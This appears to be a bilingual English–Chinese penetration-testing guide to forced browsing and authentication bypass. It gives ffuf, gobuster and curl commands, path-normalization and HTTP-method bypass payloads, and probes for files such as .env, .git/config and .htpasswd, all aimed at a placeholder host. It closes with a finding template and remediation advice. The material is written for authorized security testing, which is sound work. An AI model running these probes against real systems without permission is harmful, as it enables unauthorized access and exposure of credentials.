Back to Details

bypassing-authentication-with-forced-browsing

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Bypassing Authentication with Forced Browsing

借助强制浏览绕过身份验证

When to Use

适用场景

  • During authorized penetration tests to discover hidden or unprotected administrative pages
  • When testing whether authentication is consistently enforced across all application endpoints
  • For identifying backup files, configuration files, and debug interfaces left exposed in production
  • When assessing access control on API endpoints that should require authentication
  • During security audits to validate that all sensitive resources enforce session validation
  • 在授权渗透测试期间发现隐藏或未受保护的管理页面
  • 测试身份验证是否在所有应用端点上一致执行
  • 识别生产环境中遗留的备份文件、配置文件和调试接口
  • 评估本应要求身份验证的API端点的访问控制
  • 在安全审计期间验证所有敏感资源是否执行会话验证

Prerequisites

前提条件

  • Authorization: Written penetration testing agreement covering directory enumeration
  • ffuf: Fast web fuzzer (
    go install github.com/ffuf/ffuf/v2@latest
    )
  • Gobuster: Directory brute-force tool (
    apt install gobuster
    )
  • Burp Suite: For intercepting and analyzing requests and responses
  • Wordlists: SecLists collection (
    git clone https://github.com/danielmiessler/SecLists.git
    )
  • Target access: Network connectivity and valid test credentials for authenticated comparison
  • 授权:涵盖目录枚举的书面渗透测试协议
  • ffuf:快速Web模糊测试工具(
    go install github.com/ffuf/ffuf/v2@latest
  • Gobuster:目录暴力破解工具(
    apt install gobuster
  • Burp Suite:用于拦截和分析请求与响应
  • Wordlists:SecLists集合(
    git clone https://github.com/danielmiessler/SecLists.git
  • 目标访问权限:网络连通性以及用于身份验证对比的有效测试凭据

Workflow

操作流程

Step 1: Enumerate Hidden Directories and Files

步骤1:枚举隐藏目录和文件

Use ffuf or Gobuster to discover paths not linked in the application's navigation.
bash
undefined
使用ffuf或Gobuster发现应用导航中未链接的路径。
bash
undefined

Directory enumeration with ffuf

Directory enumeration with ffuf

ffuf -u https://target.example.com/FUZZ
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
-mc 200,301,302,403
-fc 404
-o results-dirs.json -of json
-t 50 -rate 100
ffuf -u https://target.example.com/FUZZ
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
-mc 200,301,302,403
-fc 404
-o results-dirs.json -of json
-t 50 -rate 100

File enumeration with common extensions

File enumeration with common extensions

ffuf -u https://target.example.com/FUZZ
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
-e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.cfg,.conf,.env
-mc 200,301,302,403
-fc 404
-o results-files.json -of json
-t 50 -rate 100
ffuf -u https://target.example.com/FUZZ
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
-e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.cfg,.conf,.env
-mc 200,301,302,403
-fc 404
-o results-files.json -of json
-t 50 -rate 100

Gobuster for directory enumeration

Gobuster for directory enumeration

gobuster dir -u https://target.example.com
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
-s "200,204,301,302,307,403"
-x php,asp,aspx,jsp,html
-o gobuster-results.txt
-t 50
undefined
gobuster dir -u https://target.example.com
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
-s "200,204,301,302,307,403"
-x php,asp,aspx,jsp,html
-o gobuster-results.txt
-t 50
undefined

Step 2: Discover Administrative and Debug Interfaces

步骤2:发现管理和调试接口

Target common administrative paths and debug endpoints.
bash
undefined
针对常见管理路径和调试端点进行测试。
bash
undefined

Admin panel enumeration

Admin panel enumeration

ffuf -u https://target.example.com/FUZZ
-w /usr/share/seclists/Discovery/Web-Content/common.txt
-mc 200,301,302
-t 50 -rate 100
ffuf -u https://target.example.com/FUZZ
-w /usr/share/seclists/Discovery/Web-Content/common.txt
-mc 200,301,302
-t 50 -rate 100

Common admin paths to check manually:

Common admin paths to check manually:

/admin, /administrator, /admin-panel, /wp-admin

/admin, /administrator, /admin-panel, /wp-admin

/cpanel, /phpmyadmin, /adminer, /manager

/cpanel, /phpmyadmin, /adminer, /manager

/console, /debug, /actuator, /swagger-ui

/console, /debug, /actuator, /swagger-ui

/graphql, /graphiql, /.env, /server-status

/graphql, /graphiql, /.env, /server-status

API endpoint discovery

API endpoint discovery

ffuf -u https://target.example.com/api/FUZZ
-w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
-mc 200,201,204,301,302,401,403
-fc 404
-o api-results.json -of json
ffuf -u https://target.example.com/api/FUZZ
-w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
-mc 200,201,204,301,302,401,403
-fc 404
-o api-results.json -of json

Check for Spring Boot Actuator endpoints

Check for Spring Boot Actuator endpoints

for endpoint in env health info beans configprops mappings trace; do curl -s -o /dev/null -w "%{http_code} /actuator/$endpoint\n"
"https://target.example.com/actuator/$endpoint" done
undefined
for endpoint in env health info beans configprops mappings trace; do curl -s -o /dev/null -w "%{http_code} /actuator/$endpoint\n"
"https://target.example.com/actuator/$endpoint" done
undefined

Step 3: Test Authentication Enforcement on Discovered Endpoints

步骤3:测试已发现端点的身份验证执行情况

Compare responses between unauthenticated and authenticated requests.
bash
undefined
对比未认证和已认证请求的响应。
bash
undefined

Test without authentication

Test without authentication

curl -s -o /dev/null -w "%{http_code}"
"https://target.example.com/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}"
"https://target.example.com/admin/dashboard"

Test with valid session cookie

Test with valid session cookie

curl -s -o /dev/null -w "%{http_code}"
-b "session=valid_session_token_here"
"https://target.example.com/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}"
-b "session=valid_session_token_here"
"https://target.example.com/admin/dashboard"

Automated check: compare response sizes

Automated check: compare response sizes

Unauthenticated request

Unauthenticated request

curl -s "https://target.example.com/admin/users" | wc -c
curl -s "https://target.example.com/admin/users" | wc -c

Authenticated request

Authenticated request

curl -s -b "session=valid_token"
"https://target.example.com/admin/users" | wc -c
curl -s -b "session=valid_token"
"https://target.example.com/admin/users" | wc -c

If both return similar content, authentication is not enforced

If both return similar content, authentication is not enforced

Test with Burp Intruder: send a list of discovered URLs

Test with Burp Intruder: send a list of discovered URLs

without cookies and flag any 200 responses

without cookies and flag any 200 responses

undefined
undefined

Step 4: Test HTTP Method-Based Authentication Bypass

步骤4:测试基于HTTP方法的身份验证绕过

Some applications only enforce authentication for specific HTTP methods.
bash
undefined
部分应用仅对特定HTTP方法执行身份验证。
bash
undefined

Test different HTTP methods on protected endpoints

Test different HTTP methods on protected endpoints

for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do echo -n "$method: " curl -s -o /dev/null -w "%{http_code}"
-X "$method" "https://target.example.com/admin/settings" done
for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do echo -n "$method: " curl -s -o /dev/null -w "%{http_code}"
-X "$method" "https://target.example.com/admin/settings" done

Test HTTP method override headers

Test HTTP method override headers

curl -s -o /dev/null -w "%{http_code}"
-X POST
-H "X-HTTP-Method-Override: GET"
"https://target.example.com/admin/settings"
curl -s -o /dev/null -w "%{http_code}"
-H "X-Original-Method: GET"
-H "X-Rewrite-URL: /admin/settings"
"https://target.example.com/"
undefined
curl -s -o /dev/null -w "%{http_code}"
-X POST
-H "X-HTTP-Method-Override: GET"
"https://target.example.com/admin/settings"
curl -s -o /dev/null -w "%{http_code}"
-H "X-Original-Method: GET"
-H "X-Rewrite-URL: /admin/settings"
"https://target.example.com/"
undefined

Step 5: Test Path Traversal and URL Normalization Bypass

步骤5:测试路径遍历和URL规范化绕过

Exploit URL parsing differences to bypass path-based authentication rules.
bash
undefined
利用URL解析差异绕过基于路径的身份验证规则。
bash
undefined

Path normalization bypass attempts

Path normalization bypass attempts

curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/ADMIN/dashboard" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/./dashboard" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/public/../admin/dashboard" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin%2fdashboard" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/;/admin/dashboard" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin;anything/dashboard" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/.;/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/ADMIN/dashboard" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/./dashboard" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/public/../admin/dashboard" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin%2fdashboard" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/;/admin/dashboard" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin;anything/dashboard" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/.;/admin/dashboard"

Double URL encoding

Double URL encoding

curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/%2561dmin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/%2561dmin/dashboard"

Trailing characters

Trailing characters

curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard/" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard.json" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard%00"
undefined
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard/" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard.json" curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard%00"
undefined

Step 6: Discover Backup and Configuration Files

步骤6:发现备份和配置文件

Search for sensitive files inadvertently exposed on the web server.
bash
undefined
搜索Web服务器上意外暴露的敏感文件。
bash
undefined

Backup file discovery

Backup file discovery

ffuf -u https://target.example.com/FUZZ
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
-e .bak,.old,.orig,.save,.swp,.tmp,.dist,.config,.sql,.gz,.tar,.zip
-mc 200 -t 50 -rate 100
ffuf -u https://target.example.com/FUZZ
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
-e .bak,.old,.orig,.save,.swp,.tmp,.dist,.config,.sql,.gz,.tar,.zip
-mc 200 -t 50 -rate 100

Common sensitive files

Common sensitive files

for file in .env .git/config .git/HEAD .svn/entries
web.config wp-config.php.bak config.php.old
database.yml .htpasswd server-status phpinfo.php
robots.txt sitemap.xml crossdomain.xml; do status=$(curl -s -o /dev/null -w "%{http_code}"
"https://target.example.com/$file") if [ "$status" != "404" ]; then echo "FOUND ($status): $file" fi done
for file in .env .git/config .git/HEAD .svn/entries
web.config wp-config.php.bak config.php.old
database.yml .htpasswd server-status phpinfo.php
robots.txt sitemap.xml crossdomain.xml; do status=$(curl -s -o /dev/null -w "%{http_code}"
"https://target.example.com/$file") if [ "$status" != "404" ]; then echo "FOUND ($status): $file" fi done

Git repository exposure check

Git repository exposure check

curl -s "https://target.example.com/.git/HEAD"
curl -s "https://target.example.com/.git/HEAD"

If this returns "ref: refs/heads/main", the git repo is exposed

If this returns "ref: refs/heads/main", the git repo is exposed

undefined
undefined

Key Concepts

核心概念

ConceptDescription
Forced BrowsingDirectly accessing URLs that are not linked but exist on the server
Directory EnumerationBrute-forcing directory and file names against a wordlist to discover hidden content
Authentication BypassAccessing protected resources without valid credentials due to missing access checks
Path NormalizationExploiting differences in how web servers and application frameworks parse URL paths
Method-based BypassUsing alternative HTTP methods (PUT, DELETE) that may not have authentication checks
Information DisclosureExposure of sensitive configuration files, backups, or debug interfaces
Defense in DepthLayered security controls where authentication is enforced at multiple levels
概念描述
强制浏览直接访问服务器上存在但未链接的URL
目录枚举针对字典暴力破解目录和文件名,以发现隐藏内容
身份验证绕过由于缺少访问检查,无需有效凭据即可访问受保护资源
路径规范化利用Web服务器和应用框架解析URL路径的差异
基于方法的绕过使用可能未设置身份验证检查的替代HTTP方法(PUT、DELETE)
信息泄露敏感配置文件、备份或调试接口暴露
纵深防御在多个层面执行身份验证的分层安全控制

Tools & Systems

工具与系统

ToolPurpose
ffufFast web fuzzer for directory, file, and parameter enumeration
GobusterDirectory and DNS brute-forcing tool written in Go
FeroxbusterRecursive content discovery tool with automatic recursion
DirBusterOWASP Java-based directory brute-force tool with GUI
Burp SuiteHTTP proxy for request interception and automated scanning
SecListsComprehensive collection of wordlists for security testing
工具用途
ffuf用于目录、文件和参数枚举的快速Web模糊测试工具
Gobuster基于Go语言编写的目录和DNS暴力破解工具
Feroxbuster具备自动递归功能的递归内容发现工具
DirBusterOWASP基于Java的带GUI的目录暴力破解工具
Burp Suite用于请求拦截和自动化扫描的HTTP代理
SecLists用于安全测试的综合性字典集合

Common Scenarios

常见场景

Scenario 1: Exposed Admin Panel

场景1:暴露的管理面板

An admin panel at 
/admin/
is only hidden by not being linked in the navigation. Direct URL access reveals the full administrative interface without any authentication check.
位于
/admin/
的管理面板仅通过不在导航中链接来隐藏。直接访问URL即可显示完整的管理界面,无需任何身份验证检查。

Scenario 2: Unprotected API Endpoints

场景2:未受保护的API端点

API endpoints at 
/api/v1/users
and 
/api/v1/settings
require authentication in the frontend application but the backend API does not enforce session validation, allowing unauthenticated direct access.
前端应用中
/api/v1/users
/api/v1/settings
端点要求身份验证,但后端API未执行会话验证,允许未授权直接访问。

Scenario 3: Backup File Containing Credentials

场景3:包含凭据的备份文件

A developer left 
config.php.bak
on the production server. This backup file contains database credentials in plaintext, discovered through extension-based enumeration.
开发人员将
config.php.bak
遗留在生产服务器上。该备份文件包含明文数据库凭据,可通过基于扩展名的枚举发现。

Scenario 4: Spring Boot Actuator Exposure

场景4:Spring Boot Actuator暴露

The 
/actuator/env
endpoint is exposed without authentication, revealing environment variables including database connection strings, API keys, and secrets.
/actuator/env
端点未经过身份验证即可访问,泄露了环境变量,包括数据库连接字符串、API密钥和机密信息。

Output Format

输出格式

undefined
undefined

Forced Browsing / Authentication Bypass Finding

强制浏览 / 身份验证绕过发现

Vulnerability: Missing Authentication on Administrative Interface Severity: Critical (CVSS 9.1) Location: /admin/dashboard (GET, no authentication required) OWASP Category: A01:2021 - Broken Access Control
漏洞:管理界面缺少身份验证 严重程度:关键(CVSS 9.1) 位置:/admin/dashboard(GET,无需身份验证) OWASP分类:A01:2021 - 访问控制失效

Discovered Unprotected Resources

发现的未受保护资源

PathStatusAuth RequiredContent
/admin/dashboard200NoFull admin panel
/admin/users200NoUser management
/actuator/env200NoEnvironment variables
/config.php.bak200NoDatabase credentials
/.git/HEAD200NoGit repository metadata
路径状态码是否需要身份验证内容
/admin/dashboard200完整管理面板
/admin/users200用户管理功能
/actuator/env200环境变量
/config.php.bak200数据库凭据
/.git/HEAD200Git仓库元数据

Impact

影响

  • Unauthenticated access to administrative functions
  • Ability to create, modify, and delete user accounts
  • Exposure of database credentials and API keys
  • Full source code disclosure via exposed Git repository
  • 未授权访问管理功能
  • 能够创建、修改和删除用户账户
  • 数据库凭据和API密钥泄露
  • 通过暴露的Git仓库泄露完整源代码

Recommendation

建议

  1. Implement authentication checks at the server/middleware level for all admin routes
  2. Remove backup files, debug endpoints, and version control metadata from production
  3. Configure web server to deny access to sensitive file extensions (.bak, .old, .env, .git)
  4. Implement IP-based access restrictions for administrative interfaces
  5. Use a reverse proxy to restrict access to internal-only endpoints
undefined
  1. 在服务器/中间件层面为所有管理路由实现身份验证检查
  2. 从生产环境中移除备份文件、调试端点和版本控制元数据
  3. 配置Web服务器以拒绝访问敏感文件扩展名(.bak、.old、.env、.git)
  4. 为管理界面实现基于IP的访问限制
  5. 使用反向代理限制对内部专用端点的访问
undefined